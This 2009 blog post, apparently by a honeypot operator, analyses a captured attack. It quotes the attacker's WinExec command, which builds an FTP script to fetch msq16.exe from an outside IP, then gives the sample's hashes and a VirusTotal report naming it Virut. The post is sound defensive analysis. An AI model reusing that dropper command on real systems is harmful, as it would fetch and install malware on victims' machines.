Iteolih: malicious ftp services

26 Jul 2009 Markus Koetter iteolih

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec(“cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 » o &echo get msq16.exe » o”)
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

I did not expect downloading the malware getting a problem, as all information required was available, including host credentials and filename. But, as the ftp service embedded in the malware is still special, it was a problem.
The ftp service is designed to work with the windows ftp client, the windows ftp only provides active ftp, active ftp does not work on nat if the ftp service port is not on default port 21. Apart from that, the ftp service may fail with 6% of all ports.

I’ve had the same problems with nepenthes 3 years ago, but had the slight hope the malware authors might have fixed it in the meantime. Obviously I was wrong.

As I was looking for a more general solution than using netcat, I scripted a small ftp client in python, using pythons ftplib. Provided your external ip and a forwarded port range, the client is able to download files via active ftp from Designed for Windows ™ ftp services.

You can download the script here, verified to work with python3.x and 2.x.

After getting the file,

msq16.exe
File size: 550912 bytes
MD5   : 8d599fa3d633de4d24dea51af67a61c9
SHA1  : f11188ad9501c1b6cdc051c6cd09776eec5b282e
SHA256: 75dd3c06d832a270e0838b3eaf87ad428f3bab16e2599a33c4415dc94362547c

I sent it to virustotal.com, here is the report:

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.07.25 Trojan.Win32.Refroso!IK
AhnLab-V3 5.0.0.2 2009.07.25 Win32/Virut.B
AntiVir 7.9.0.228 2009.07.24 W32/Virut.AX
Antiy-AVL 2.0.3.7 2009.07.24 -
Authentium 5.1.2.4 2009.07.25 W32/Virut.7116
Avast 4.8.1335.0 2009.07.25 Win32:Virtob
AVG 8.5.0.387 2009.07.25 Win32/Virut
BitDefender 7.2 2009.07.25 Trojan.Generic.2200851
CAT-QuickHeal 10.00 2009.07.25 W32.Virut.Z
ClamAV 0.94.1 2009.07.25 W32.Virut-54
Comodo 1741 2009.07.25 Worm.Win32.Email-Worm.generic.daisy-1529
DrWeb 5.0.0.12182 2009.07.25 Trojan.KeyLogger.2526
eSafe 7.0.17.0 2009.07.23 -
eTrust-Vet 31.6.6640 2009.07.25 Win32/Virut.7115
F-Prot 4.4.4.56 2009.07.25 W32/Virut.7116
F-Secure 8.0.14470.0 2009.07.25 Virus.Win32.Virut.av
Fortinet 3.120.0.0 2009.07.25 W32/Virut.AV
GData 19 2009.07.25 Trojan.Generic.2200851
Ikarus T3.1.1.64.0 2009.07.25 Trojan.Win32.Refroso
Jiangmin 11.0.800 2009.07.25 Win32/Virut.af
K7AntiVirus 7.10.802 2009.07.25 Virus.Win32.Virut.av
Kaspersky 7.0.0.125 2009.07.25 Virus.Win32.Virut.av
McAfee 5688 2009.07.25 W32/Virut.gen.a
McAfee+Artemis 5688 2009.07.25 W32/Virut.gen.a
McAfee-GW-Edition 6.8.5 2009.07.25 Heuristic.LooksLike.Trojan.Dropper.J
Microsoft 1.4903 2009.07.25 Virus:Win32/Virut.AC
NOD32 4277 2009.07.25 Win32/Virut.AV
Norman
2009.07.24 W32/Virut.AG
nProtect 2009.1.8.0 2009.07.25 Virus/W32.Virut.K
Panda 10.0.0.14 2009.07.25 W32/Virutas.FG
PCTools 4.4.2.0 2009.07.25 Win32.Virut.Gen.4
Prevx 3.0 2009.07.25 -
Rising 21.39.52.00 2009.07.25 Win32.Virut.an
Sophos 4.44.0 2009.07.25 W32/Virut-W
Sunbelt 3.2.1858.2 2009.07.25 Win32.Virut.av (v)
Symantec 1.4.4.12 2009.07.25 W32.Virut.W
TheHacker 6.3.4.3.373 2009.07.24 W32/Virut.av
TrendMicro 8.950.0.1094 2009.07.25 PE_VIRUT.AV
VBA32 3.12.10.9 2009.07.24 Virus.Win32.Virut.2
ViRobot 2009.7.25.1853 2009.07.25 Win32.Virut.S
VirusBuster 4.6.5.0 2009.07.25 Win32.Virut.Gen.4